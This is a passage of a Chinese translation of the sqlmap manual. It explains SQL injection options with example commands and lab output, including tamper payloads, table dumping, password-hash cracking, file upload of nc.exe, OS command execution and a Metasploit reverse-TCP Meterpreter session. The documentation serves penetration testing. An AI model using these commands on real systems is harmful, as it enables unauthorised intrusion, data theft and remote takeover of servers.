    def tamper(payload):
    ??? '''
    ??? Description of your tamper script
    ??? '''
    ??? retVal = payload
    ??? # your code to tamper the original payload
    ??? # return the tampered payload
    ??? return retVal

    可以查看 tamper/ 目錄下的有哪些可用的腳本

    例如:

    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

    [hh:mm:03] [DEBUG] cleaning up configuration parameters
    [hh:mm:03] [INFO] loading tamper script 'between'
    [hh:mm:03] [INFO] loading tamper script 'randomcase'
    [hh:mm:03] [INFO] loading tamper script 'space2comment'
    [...]
    [hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092
    [hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057
    [hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041
    [...]
    [hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
    [hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONCAT(cHar(
    58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/**/elsE/**/0/**/
    ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/information_schema.tables/**/
    group/**/bY/**/x)a)
    [hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING
    clause' injectable
    [...]

    探測
    探測等級

    參數:--level

    共有五個等級,默認為1,sqlmap使用的payload可以在xml/payloads.xml中看到,你也可以根據相應的格式添加自己的payload。

    這個參數不僅影響使用哪些payload同時也會影響測試的注入點,GET和POST的數據都會測試,HTTP Cookie在level為2的時候就會測試,HTTP User-Agent/Referer頭在level為3的時候就會測試。

    總之在你不確定哪個payload或者參數為注入點的時候,為了保證全面性,建議使用高的level值。
    風險等級

    參數:--risk

    共有四個風險等級,默認是1會測試大部分的測試語句,2會增加基于事件的測試語句,3會增加OR語句的SQL注入測試。

    在有些時候,例如在UPDATE的語句中,注入一個OR的測試語句,可能導致更新的整個表,可能造成很大的風險。

    測試的語句同樣可以在xml/payloads.xml中找到,你也可以自行添加payload。
    頁面比較

    參數:--string,--not-string,--regexp,--code

    默認情況下sqlmap通過判斷返回頁面的不同來判斷真假,但有時候這會產生誤差,因為有的頁面在每次刷新的時候都會返回不同的代碼,比如頁面當中包含一個動態的廣告或者其他內容,這會導致sqlmap的誤判。此時用戶可以提供一個字符串或者一段正則匹配,在原始頁面與真條件下的頁面都存在的字符串,而錯誤頁面中不存在(使用--string參數添加字符串,--regexp添加正則),同時用戶可以提供一段字符串在原始頁面與真條件下的頁面都不存在的字符串,而錯誤頁面中存在的字符串(--not-string添加)。用戶也可以提供真與假條件返回的HTTP狀態碼不一樣來注入,例如,響應200的時候為真,響應401的時候為假,可以添加參數--code=200。

    參數:--text-only,--titles

    有些時候用戶知道真條件下的返回頁面與假條件下返回頁面是不同位置在哪里可以使用--text-only(HTTP響應體中不同)--titles(HTML的title標簽中不同)。
    注入技術
    測試是否是注入

    參數:--technique

    這個參數可以指定sqlmap使用的探測技術,默認情況下會測試所有的方式。

    支持的探測方式如下:

    B: Boolean-based blind SQL injection(布爾型注入)
    E: Error-based SQL injection(報錯型注入)
    U: UNION query SQL injection(可聯合查詢注入)
    S: Stacked queries SQL injection(可多語句查詢注入)
    T: Time-based blind SQL injection(基于時間延遲注入)

    設定延遲注入的時間

    參數:--time-sec

    當使用繼續時間的盲注時,時刻使用--time-sec參數設定延時時間,默認是5秒。
    設定UNION查詢字段數

    參數:--union-cols

    默認情況下sqlmap測試UNION查詢注入會測試1-10個字段數,當--level為5的時候他會增加測試到50個字段數。設定--union-cols的值應該是一段整數,如:12-16,是測試12-16個字段數。
    設定UNION查詢使用的字符

    參數:--union-char

    默認情況下sqlmap針對UNION查詢的注入會使用NULL字符,但是有些情況下會造成頁面返回失敗,而一個隨機整數是成功的,這是你可以用--union-char只定UNION查詢的字符。
    二階SQL注入

    參數:--second-order

    有些時候注入點輸入的數據看返回結果的時候并不是當前的頁面,而是另外的一個頁面,這時候就需要你指定到哪個頁面獲取響應判斷真假。--second-order后門跟一個判斷頁面的URL地址。
    列數據
    標志

    參數:-b,--banner

    大多數的數據庫系統都有一個函數可以返回數據庫的版本號,通常這個函數是version()或者變量@@version這主要取決與是什么數據庫。
    用戶

    參數:-current-user

    在大多數據庫中可以獲取到管理數據的用戶。
    當前數據庫

    參數:--current-db

    返還當前連接的數據庫。
    當前用戶是否為管理用

    參數:--is-dba

    判斷當前的用戶是否為管理,是的話會返回True。
    列數據庫管理用戶

    參數:--users

    當前用戶有權限讀取包含所有用戶的表的權限時,就可以列出所有管理用戶。
    列出并破解數據庫用戶的hash

    參數:--passwords

    當前用戶有權限讀取包含用戶密碼的彪的權限時,sqlmap會現列舉出用戶,然后列出hash,并嘗試破解。

    例子:

    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1
    [...]
    back-end DBMS: PostgreSQL
    [hh:mm:38] [INFO] fetching database users password hashes
    do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
    [hh:mm:42] [INFO] using hash method: 'postgres_passwd'
    what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt]
    [hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt'
    do you want to use common password suffixes? (slow!) [y/N] n
    [hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
    [hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
    [hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
    database management system users password hashes:
    [*] postgres [1]:
    ??? password hash: md5d7d880f96044b72d0bba108ace96d1e4
    ??? clear-text password: testpass
    [*] testuser [1]:
    ??? password hash: md599e5ea7a6f7c3269995cba3927fd0093
    ??? clear-text password: testpass

    可以看到sqlmap不僅勒出數據庫的用戶跟密碼,同時也識別出是PostgreSQL數據庫,并詢問用戶是否采用字典爆破的方式進行破解,這個爆破已經支持Oracle和Microsoft SQL Server。

    也可以提供-U參數來指定爆破哪個用戶的hash。
    列出數據庫管理員權限

    參數:--privileges

    當前用戶有權限讀取包含所有用戶的表的權限時,很可能列舉出每個用戶的權限,sqlmap將會告訴你哪個是數據庫的超級管理員。也可以用-U參數指定你想看哪個用戶的權限。
    列出數據庫管理員角色

    參數:--roles

    當前用戶有權限讀取包含所有用戶的表的權限時,很可能列舉出每個用戶的角色,也可以用-U參數指定你想看哪個用戶的角色。

    僅適用于當前數據庫是Oracle的時候。
    列出數據庫系統的數據庫

    參數:--dbs

    當前用戶有權限讀取包含所有數據庫列表信息的表中的時候,即可列出所有的數據庫。
    列舉數據庫表

    參數:--tables,--exclude-sysdbs,-D

    當前用戶有權限讀取包含所有數據庫表信息的表中的時候,即可列出一個特定數據的所有表。

    如果你不提供-D參數來列指定的一個數據的時候,sqlmap會列出數據庫所有庫的所有表。

    --exclude-sysdbs參數是指包含了所有的系統數據庫。

    需要注意的是在Oracle中你需要提供的是TABLESPACE_NAME而不是數據庫名稱。
    列舉數據庫表中的字段

    參數:--columns,-C,-T,-D

    當前用戶有權限讀取包含所有數據庫表信息的表中的時候,即可列出指定數據庫表中的字段,同時也會列出字段的數據類型。

    如果沒有使用-D參數指定數據庫時,默認會使用當前數據庫。

    列舉一個SQLite的例子:

    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users -C name
    [...]
    Database: SQLite_masterdb
    Table: users
    [3 columns]
    +---------+---------+
    | Column? | Type??? |
    +---------+---------+
    | id????? | INTEGER |
    | name??? | TEXT??? |
    | surname | TEXT??? |
    +---------+---------+

    列舉數據庫系統的架構

    參數:--schema,--exclude-sysdbs

    用戶可以用此參數獲取數據庫的架構,包含所有的數據庫,表和字段,以及各自的類型。

    加上--exclude-sysdbs參數,將不會獲取數據庫自帶的系統庫內容。

    MySQL例子:

    $ python sqlmap.py -u "http://192.168.48.130/sqlmap/mysql/get_int.php?id=1" --schema --batch --exclude-sysdbs
    [...]
    Database: owasp10
    Table: accounts
    [4 columns]
    +-------------+---------+
    | Column????? | Type??? |
    +-------------+---------+
    | cid???????? | int(11) |
    | mysignature | text??? |
    | password??? | text??? |
    | username??? | text??? |
    +-------------+---------+

    Database: owasp10
    Table: blogs_table
    [4 columns]
    +--------------+----------+
    | Column?????? | Type???? |
    +--------------+----------+
    | date???????? | datetime |
    | blogger_name | text???? |
    | cid????????? | int(11)? |
    | comment????? | text???? |
    +--------------+----------+

    Database: owasp10
    Table: hitlog
    [6 columns]
    +----------+----------+
    | Column?? | Type???? |
    +----------+----------+
    | date???? | datetime |
    | browser? | text???? |
    | cid????? | int(11)? |
    | hostname | text???? |
    | ip?????? | text???? |
    | referer? | text???? |
    +----------+----------+

    Database: testdb
    Table: users
    [3 columns]
    +---------+---------------+
    | Column? | Type????????? |
    +---------+---------------+
    | id????? | int(11)?????? |
    | name??? | varchar(500)? |
    | surname | varchar(1000) |
    +---------+---------------+
    [...]

    獲取表中數據個數

    參數:--count

    有時候用戶只想獲取表中的數據個數而不是具體的內容,那么就可以使用這個參數。

    列舉一個Microsoft SQL Server例子:

    $ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb
    [...]
    Database: testdb
    +----------------+---------+
    | Table????????? | Entries |
    +----------------+---------+
    | dbo.users????? | 4?????? |
    | dbo.users_blob | 2?????? |
    +----------------+---------+

    獲取整個表的數據

    參數:--dump,-C,-T,-D,--start,--stop,--first,--last

    如果當前管理員有權限讀取數據庫其中的一個表的話,那么就能獲取真個表的所有內容。

    使用-D,-T參數指定想要獲取哪個庫的哪個表,不適用-D參數時,默認使用當前庫。

    列舉一個Firebird的例子:

    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
    [...]
    Database: Firebird_masterdb
    Table: USERS
    [4 entries]
    +----+--------+------------+
    | ID | NAME?? | SURNAME??? |
    +----+--------+------------+
    | 1? | luther | blisset??? |
    | 2? | fluffy | bunny????? |
    | 3? | wu???? | ming?????? |
    | 4? | NULL?? | nameisnull |
    +----+--------+------------+

    可以獲取指定庫中的所有表的內容,只用-dump跟-D參數(不使用-T與-C參數)。

    也可以用-dump跟-C獲取指定的字段內容。

    sqlmap為每個表生成了一個CSV文件。

    如果你只想獲取一段數據,可以使用--start和--stop參數,例如,你只想獲取第一段數據可hi使用--stop 1,如果想獲取第二段與第三段數據,使用參數 --start 1 --stop 3。

    也可以用--first與--last參數,獲取第幾個字符到第幾個字符的內容,如果你想獲取字段中地三個字符到第五個字符的內容,使用--first 3 --last 5,只在盲注的時候使用,因為其他方式可以準確的獲取注入內容,不需要一個字符一個字符的猜解。
    獲取所有數據庫表的內容

    參數:--dump-all,--exclude-sysdbs

    使用--dump-all參數獲取所有數據庫表的內容,可同時加上--exclude-sysdbs只獲取用戶數據庫的表,需要注意在Microsoft SQL Server中master數據庫沒有考慮成為一個系統數據庫,因為有的管理員會把他當初用戶數據庫一樣來使用它。
    搜索字段,表,數據庫

    參數:--search,-C,-T,-D

    --search可以用來尋找特定的數據庫名,所有數據庫中的特定表名,所有數據庫表中的特定字段。

    可以在一下三種情況下使用:

    -C后跟著用逗號分割的列名,將會在所有數據庫表中搜索指定的列名。
    -T后跟著用逗號分割的表名,將會在所有數據庫中搜索指定的表名
    -D后跟著用逗號分割的庫名,將會在所有數據庫中搜索指定的庫名。

    運行自定義的SQL語句

    參數:--sql-query,--sql-shell

    sqlmap會自動檢測確定使用哪種SQL注入技術,如何插入檢索語句。

    如果是SELECT查詢語句,sqlap將會輸出結果。如果是通過SQL注入執行其他語句,需要測試是否支持多語句執行SQL語句。

    列舉一個Mircrosoft SQL Server 2000的例子:

    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1

    [...]
    [hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
    [hh:mm:14] [INFO] retrieved: foo
    SELECT 'foo':??? 'foo'

    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo', 'bar'" -v 2

    [...]
    [hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
    [hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into
    distinct queries to be able to retrieve the output even if we are going blind
    [hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)),
    (CHAR(32)))
    [hh:mm:50] [INFO] retrieved: foo
    [hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
    [hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)),
    (CHAR(32)))
    [hh:mm:50] [INFO] retrieved: bar
    [hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
    SELECT 'foo', 'bar':??? 'foo, bar'

    爆破
    暴力破解表名

    參數:--common-tables

    當使用--tables無法獲取到數據庫的表時,可以使用此參數。

    通常是如下情況:

    1、MySQL數據庫版本小于5.0,沒有information_schema表。
    2、數據庫是Microssoft Access,系統表MSysObjects是不可讀的(默認)。
    3、當前用戶沒有權限讀取系統中保存數據結構的表的權限。

    暴力破解的表在txt/common-tables.txt文件中,你可以自己添加。

    列舉一個MySQL 4.1的例子:

    $ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner

    [...]
    [hh:mm:39] [INFO] testing MySQL
    [hh:mm:39] [INFO] confirming MySQL
    [hh:mm:40] [INFO] the back-end DBMS is MySQL
    [hh:mm:40] [INFO] fetching banner
    web server operating system: Windows
    web application technology: PHP 5.3.1, Apache 2.2.14
    back-end DBMS operating system: Windows
    back-end DBMS: MySQL &lt; 5.0.0
    banner:??? '4.1.21-community-nt'

    [hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt'
    [hh:mm:40] [INFO] adding words used on web page to the check list
    please enter number of threads? [Enter for 1 (current)] 8
    [hh:mm:43] [INFO] retrieved: users

    Database: testdb
    [1 table]
    +-------+
    | users |
    +-------+

    暴力破解列名

    參數:--common-columns

    與暴力破解表名一樣,暴力跑的列名在txt/common-columns.txt中。
    用戶自定義函數注入

    參數:--udf-inject,--shared-lib

    你可以通過編譯MySQL注入你自定義的函數(UDFs)或PostgreSQL在windows中共享庫,DLL,或者Linux/Unix中共享對象,sqlmap將會問你一些問題,上傳到服務器數據庫自定義函數,然后根據你的選擇執行他們,當你注入完成后,sqlmap將會移除它們。
    系統文件操作
    從數據庫服務器中讀取文件

    參數:--file-read

    當數據庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當前用戶有權限使用特定的函數。讀取的文件可以是文本也可以是二進制文件。

    列舉一個Microsoft SQL Server 2005的例子:

    $ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
    --file-read "C:/example.exe" -v 1

    [...]
    [hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows 2000
    web application technology: ASP.NET, Microsoft IIS 6.0, ASP
    back-end DBMS: Microsoft SQL Server 2005

    [hh:mm:50] [INFO] fetching file: 'C:/example.exe'
    [hh:mm:50] [INFO] the SQL query provided returns 3 entries
    C:/example.exe file saved to:??? '/software/sqlmap/output/192.168.136.129/files/C__example.exe'
    [...]

    $ ls -l output/192.168.136.129/files/C__example.exe
    -rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe

    $ file output/192.168.136.129/files/C__example.exe
    output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
    80386 32-bit

    把文件上傳到數據庫服務器中

    參數:--file-write,--file-dest

    當數據庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當前用戶有權限使用特定的函數。上傳的文件可以是文本也可以是二進制文件。

    列舉一個MySQL的例子:

    $ file /software/nc.exe.packed
    /software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit

    $ ls -l /software/nc.exe.packed
    -rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed

    $ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
    "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1

    [...]
    [hh:mm:29] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows 2003 or 2008
    web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
    back-end DBMS: MySQL &gt;= 5.0.0

    [...]
    do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully
    written on the back-end DBMS file system? [Y/n] y
    [hh:mm:52] [INFO] retrieved: 31744
    [hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes,
    same size as the local file '/software/nc.exe.packed'

    運行任意操作系統命令

    參數:--os-cmd,--os-shell

    當數據庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當前用戶有權限使用特定的函數。

    在MySQL、PostgreSQL,sqlmap上傳一個二進制庫,包含用戶自定義的函數,sys_exec()和sys_eval()。

    那么他創建的這兩個函數可以執行系統命令。在Microsoft SQL Server,sqlmap將會使用xp_cmdshell存儲過程,如果被禁(在Microsoft SQL Server 2005及以上版本默認禁制),sqlmap會重新啟用它,如果不存在,會自動創建。

    列舉一個PostgreSQL的例子:

    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \
    --os-cmd id -v 1

    [...]
    web application technology: PHP 5.2.6, Apache 2.2.9
    back-end DBMS: PostgreSQL
    [hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
    [hh:mm:12] [INFO] the back-end DBMS operating system is Linux
    [hh:mm:12] [INFO] testing if current user is DBA
    [hh:mm:12] [INFO] detecting back-end DBMS version from its banner
    [hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
    [hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
    [hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
    [hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
    do you want to retrieve the command standard output? [Y/n/a] y
    command standard output:??? 'uid=104(postgres) gid=106(postgres) groups=106(postgres)'

    [hh:mm:19] [INFO] cleaning up the database management system
    do you want to remove UDF 'sys_eval'? [Y/n] y
    do you want to remove UDF 'sys_exec'? [Y/n] y
    [hh:mm:23] [INFO] database management system cleanup finished
    [hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can
    only be deleted manually

    用--os-shell參數也可以模擬一個真實的shell,可以輸入你想執行的命令。

    當不能執行多語句的時候(比如php或者asp的后端數據庫為MySQL時),仍然可能使用INTO OUTFILE寫進可寫目錄,來創建一個web后門。支持的語言:

    1、ASP
    2、ASP.NET
    3、JSP
    4、PHP

    Meterpreter配合使用

    參數:--os-pwn,--os-smbrelay,--os-bof,--priv-esc,--msf-path,--tmp-path

    當數據庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當前用戶有權限使用特定的函數,可以在數據庫與攻擊者直接建立TCP連接,這個連接可以是一個交互式命令行的Meterpreter會話,sqlmap根據Metasploit生成shellcode,并有四種方式執行它:

    1、通過用戶自定義的sys_bineval()函數在內存中執行Metasplit的shellcode,支持MySQL和PostgreSQL數據庫,參數:--os-pwn。
    2、通過用戶自定義的函數上傳一個獨立的payload執行,MySQL和PostgreSQL的sys_exec()函數,Microsoft SQL Server的xp_cmdshell()函數,參數:--os-pwn。
    3、通過SMB攻擊(MS08-068)來執行Metasploit的shellcode,當sqlmap獲取到的權限足夠高的時候(Linux/Unix的uid=0,Windows是Administrator),--os-smbrelay。
    4、通過溢出Microsoft SQL Server 2000和2005的sp_replwritetovarbin存儲過程(MS09-004),在內存中執行Metasploit的payload,參數:--os-bof

    列舉一個MySQL例子:

    $ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit

    [...]
    [hh:mm:31] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows 2003
    web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
    back-end DBMS: MySQL 5.0
    [hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
    [hh:mm:31] [INFO] the back-end DBMS operating system is Windows
    how do you want to establish the tunnel?
    [1] TCP: Metasploit Framework (default)
    [2] ICMP: icmpsh - ICMP tunneling
    &gt;
    [hh:mm:32] [INFO] testing if current user is DBA
    [hh:mm:32] [INFO] fetching current user
    what is the back-end database management system architecture?
    [1] 32-bit (default)
    [2] 64-bit
    &gt;
    [hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
    [hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
    [hh:mm:33] [INFO] detecting back-end DBMS version from its banner
    [hh:mm:33] [INFO] retrieving MySQL base directory absolute path
    [hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
    [hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
    how do you want to execute the Metasploit shellcode on the back-end database underlying
    operating system?
    [1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
    [2] Stand-alone payload stager (file system way)
    &gt;
    [hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
    which connection type do you want to use?
    [1] Reverse TCP: Connect back from the database host to this machine (default)
    [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
    between the specified and 65535
    [3] Bind TCP: Listen on the database host for a connection
    &gt;
    which is the local address? [192.168.136.1]
    which local port number do you want to use? [60641]
    which payload do you want to use?
    [1] Meterpreter (default)
    [2] Shell
    [3] VNC
    &gt;
    [hh:mm:40] [INFO] creation in progress ... done
    [hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..

    ??????????????????????????????? _
    ??????????????????????????????? | |????? o
    _? _? _??? _ _|_? __,?? ,??? _? | |? __??? _|_
    / |/ |/ |? |/? |? /? |? / \_|/ \_|/? /? \_|? |
    |? |? |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
    ??????????????????????? /|
    ??????????????????????? \|


    ??? =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
    + -- --=[ 674 exploits - 351 auxiliary
    + -- --=[ 217 payloads - 27 encoders - 8 nops
    ??? =[ svn r12272 updated 4 days ago (2011.04.07)

    PAYLOAD =&gt; windows/meterpreter/reverse_tcp
    EXITFUNC =&gt; thread
    LPORT =&gt; 60641
    LHOST =&gt; 192.168.136.1
    [*] Started reverse handler on 192.168.136.1:60641
    [*] Starting the payload handler...
    [hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval',
    please wait..
    [*] Sending stage (749056 bytes) to 192.168.136.129
    [*] Meterpreter session 1 opened (192.168.136.1:60641 -&gt; 192.168.136.129:1689) at Mon Apr 11
    hh:mm:52 +0100 2011

    meterpreter &gt; Loading extension espia...success.
    meterpreter &gt; Loading extension incognito...success.
    meterpreter &gt; [-] The 'priv' extension has already been loaded.
    meterpreter &gt; Loading extension sniffer...success.
    meterpreter &gt; System Language : en_US
    OS????????????? : Windows .NET Server (Build 3790, Service Pack 2).
    Computer??????? : W2K3R2
    Architecture??? : x86
    Meterpreter???? : x86/win32
    meterpreter &gt; Server username: NT AUTHORITY\SYSTEM
    meterpreter &gt; ipconfig

    MS TCP Loopback interface
    Hardware MAC: 00:00:00:00:00:00
    IP Address? : 127.0.0.1
    Netmask???? : 255.0.0.0



    Intel(R) PRO/1000 MT Network Connection
    Hardware MAC: 00:0c:29:fc:79:39
    IP Address? : 192.168.136.129
    Netmask???? : 255.255.255.0


    meterpreter &gt; exit

    [*] Meterpreter session 1 closed.? Reason: User exit

    默認情況下MySQL在Windows上以SYSTEM權限運行,PostgreSQL在Windows與Linux中是低權限運行,Microsoft SQL Server 2000默認是以SYSTEM權限運行,Microsoft SQL Server 2005與2008大部分是以NETWORK SERVICE有時是LOCAL SERVICE。

    ?

    對Windows注冊表操作

    當數據庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當前web應用支持堆查詢。 當然,當前連接數據庫的用戶也需要有權限操作注冊表。

    讀取注冊表值

    參數:--reg-read
    寫入注冊表值

    參數:--reg-add
    刪除注冊表值

    參數:--reg-del
    注冊表輔助選項

    參數:--reg-key,--reg-value,--reg-data,--reg-type

    需要配合之前三個參數使用,例子:

    $ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1

    常規參數
    從sqlite中讀取session

    參數:-s

    sqlmap對每一個目標都會在output路徑下自動生成一個SQLite文件,如果用戶想指定讀取的文件路徑,就可以用這個參數。
    保存HTTP(S)日志

    參數:-t

    這個參數需要跟一個文本文件,sqlmap會把HTTP(S)請求與響應的日志保存到那里。
    非交互模式

    參數:--batch

    用此參數,不需要用戶輸入,將會使用sqlmap提示的默認值一直運行下去。
    強制使用字符編碼

    參數:--charset

    不使用sqlmap自動識別的(如HTTP頭中的Content-Type)字符編碼,強制指定字符編碼如:

    --charset=GBK

    爬行網站URL

    參數:--crawl

    sqlmap可以收集潛在的可能存在漏洞的連接,后面跟的參數是爬行的深度。

    例子:

    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
    [...]
    [xx:xx:53] [INFO] starting crawler
    [xx:xx:53] [INFO] searching for links with depth 1
    [xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
    [xx:xx:53] [INFO] searching for links with depth 2
    [xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
    [xx:xx:00] [INFO] 42/56 links visited (75%)
    [...]

    規定輸出到CSV中的分隔符

    參數:--csv-del

    當dump保存為CSV格式時(--dump-format=CSV),需要一個分隔符默認是逗號,用戶也可以改為別的 如:

    --csv-del=";"

    DBMS身份驗證

    參數:--dbms-cred

    某些時候當前用戶的權限不夠,做某些操作會失敗,如果知道高權限用戶的密碼,可以使用此參數,有的數據庫有專門的運行機制,可以切換用戶如Microsoft SQL Server的OPENROWSET函數
    定義dump數據的格式

    參數:--dump-format

    輸出的格式可定義為:CSV,HTML,SQLITE
    預估完成時間

    參數:--eta

    可以計算注入數據的剩余時間。

    例如Oracle的布爾型盲注:

    $ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta

    [...]
    [hh:mm:01] [INFO] the back-end DBMS is Oracle
    [hh:mm:01] [INFO] fetching banner
    [hh:mm:01] [INFO] retrieving the length of query output
    [hh:mm:01] [INFO] retrieved: 64
    17% [========>????????????????????????????????????????? ] 11/64? ETA 00:19

    然后:

    100% [===================================================] 64/64
    [hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod

    web application technology: PHP 5.2.6, Apache 2.2.9
    back-end DBMS: Oracle
    banner:??? 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

    sqlmap先輸出長度,預計完成時間,顯示百分比,輸出字符
    刷新session文件

    參數:--flush-session

    如果不想用之前緩存這個目標的session文件,可以使用這個參數。 會清空之前的session,重新測試該目標。
    自動獲取form表單測試

    參數:--forms

    如果你想對一個頁面的form表單中的參數測試,可以使用-r參數讀取請求文件,或者通過--data參數測試。 但是當使用--forms參數時,sqlmap會自動從-u中的url獲取頁面中的表單進行測試。
    忽略在會話文件中存儲的查詢結果

    參數:--fresh-queries

    忽略session文件保存的查詢,重新查詢。
    使用DBMS的hex函數

    參數:--hex

    有時候字符編碼的問題,可能導致數據丟失,可以使用hex函數來避免:

    針對PostgreSQL例子:

    $ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors

    [...]
    [xx:xx:14] [INFO] fetching banner
    [xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
    [xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR:? invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>'
    [xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by
    GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
    [...]

    自定義輸出的路徑

    參數:--output-dir

    sqlmap默認把session文件跟結果文件保存在output文件夾下,用此參數可自定義輸出路徑 例如:--output-dir=/tmp
    從響應中獲取DBMS的錯誤信息

    參數:--parse-errors

    有時目標沒有關閉DBMS的報錯,當數據庫語句錯誤時,會輸出錯誤語句,用詞參數可以會顯出錯誤信息。

    $ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
    [...]
